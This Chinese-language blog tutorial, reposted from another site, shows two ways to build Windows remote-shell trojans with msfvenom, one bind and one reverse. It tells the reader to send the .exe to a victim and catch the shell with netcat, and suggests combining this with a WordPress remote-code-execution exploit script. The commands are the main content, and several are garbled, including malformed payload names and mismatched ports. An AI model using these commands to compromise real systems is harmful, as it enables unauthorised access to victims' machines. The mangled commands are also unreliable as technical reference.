使用Netcat[nc]连接payload的两种方式

在本文中,您将学习如何通过netcat shell连接受害者msfvenom有效负载。

1st Method

首先打开终端并键入以下命令,使用msfvenom生成一个exe格式payload:

Msfvenom -p windows / shell_hidden_bind_tcp ahost = 192.168.0.107 lport = 8956 -f exe> /root/Desktop/root.exe

nc (1)

然后将此root.exe文件发送给受害者,并打开netcat shell的其他终端,然后键入以下命令:

nc 192.168.0.103 89565

当受害者点击root.exe文件时,攻击者将获得受害者系统的访问权限。

nc (2)

2nd Method

再次打开生成一个exe有效载荷的msfvenom的终端类型跟随命令:

Msfvenom -p windows / shell_reverse_tcp lhost = 192.168.0.107 lport = 888 -f exe> /root/Desktop/1.exe

nc (3)

然后将此1.exe文件发送给受害者,打开netcat shell的其他终端,并键入以下命令:

nc -lvp 8888

当受害者点击1.exe攻击者将得到受害者系统的反向连接。

nc (4)

其实没什么技术可言,不过刚好可以与今天的wordpress-rce-exploit.sh配合使用,替代代码中177行的nc命令,所监听端口同159行。

 

*参考来源:hackingarticles,转载请注明来自MottoIN

原创文章,作者:Jarry,如若转载,请注明出处:http://www.mottoin.com/tools/101798.html

发表评论

登录后才能评论

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code